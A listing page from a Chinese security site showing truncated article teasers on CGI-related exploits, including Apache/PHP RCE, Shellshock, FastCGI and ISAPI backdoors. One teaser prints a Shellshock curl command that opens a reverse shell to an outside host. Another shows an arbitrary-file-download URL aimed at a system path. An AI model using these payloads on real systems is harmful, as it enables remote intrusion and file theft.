cgi - 第 6 | CN-SEC 中文网

PHP FastCGI 的远程利用

说到FastCGI，大家都知道这是目前最常见的webserver动态脚本执行模型之一。目前基本所有web脚本都基本支持这种模式，甚至有的类型脚本这是唯一的模式（ROR，Python等）。 FastCG...

04月03日lcx35 views评论

阅读全文

Apache / PHP 5.x Remote Code Execution Exploit

/* Apache Magica by Kingcope */ /* gcc apache-magika.c -o apache-magika -lssl */ /* This is a code e...

04月02日lcx77 views评论

阅读全文

lcx

批量抓取QQ空间5-8年前“消失了的QQ心情”

用企鹅比较早的同学都知道早在05年到08年左右企鹅有个功能叫“QQ心情”后来改名叫“滔滔”。现在改名叫“说说”。自从某一版本更新后以前的“QQ心情、滔滔”对外已经不可见了，很多人以为自己已经删除了自...

04月02日68 views评论

阅读全文

Web服务器常见8种安全漏洞

Web服务器存在的主要漏洞包括物理路径泄露，CGI源代码泄露，目录遍历，执行任意命令，缓冲区溢出，拒绝服务，SQL注入，条件竞争和跨站脚本执行漏洞，和CGI漏洞有些相似的地方，但是更多的地方还是有着本...

03月27日安全文章194 views评论

阅读全文

【稻草人安全团队渗透组-每日漏洞推送】

❝【稻草人安全团队渗透组-每日漏洞推送】❞「CVE-2021-20655 FileZen 存在RCE漏洞」https://cve.mitre.org/cgi-bin/cvename.cgi?name=...

03月24日安全新闻291 views评论

阅读全文

安全新闻

维他命安全周报2020年第40周

本周安全态势综述 2020年09月28日至10月04日共收录安全漏洞56个，值得关注的是Foxit Reader Field::ClearItems/Field::DeleteOption...

10月09日154 views评论

阅读全文

安全新闻

6月24日每日安全热点 - NTT披露受到国家级黑客攻击

漏洞 Vulnerability 三菱机电MC Works64，MC Works32远程命令执行漏洞 https://www.us-cert.gov/ics/advisories/icsa-20-17...

06月24日462 views评论

阅读全文

漏洞时代

中新金盾抗拒绝服务系统GetShell漏洞

任意文件下载漏洞：https://1.1.1.1:28XX3/cgi-bin/index.php?t=service&c=download&filepath=/et...

01月01日510 views评论

阅读全文

漏洞时代

Apache / PHP 5.x Remote Code Execution Exploit

[php] /* Apache Magica by Kingcope */ /* gcc apache-magika.c -o apache-magika -lssl */ /* ...

01月01日751 views评论

阅读全文

Apache mod_cgi - Remote Exploit (Shellshock)

#! /usr/bin/env python from socket import * from threading import Thread import thread, time, httpli...

11月21日moonsec_com384 views评论

阅读全文

CVE-2014-6271反弹shell

curl -A "() { :;}; /bin/bash -i >& /dev/tcp/61.51.xx.xx/8080 0>&1" http...

11月21日moonsec_com439 views评论

阅读全文

安全文章

ISAPI后门与代理研究

版权归T00ls与本人共同所有，转载请联系T00ls管理员0x01 ISAPI介绍ISAPI（Internet Server Application Programming Interface）作为一...

05月12日112 views评论

阅读全文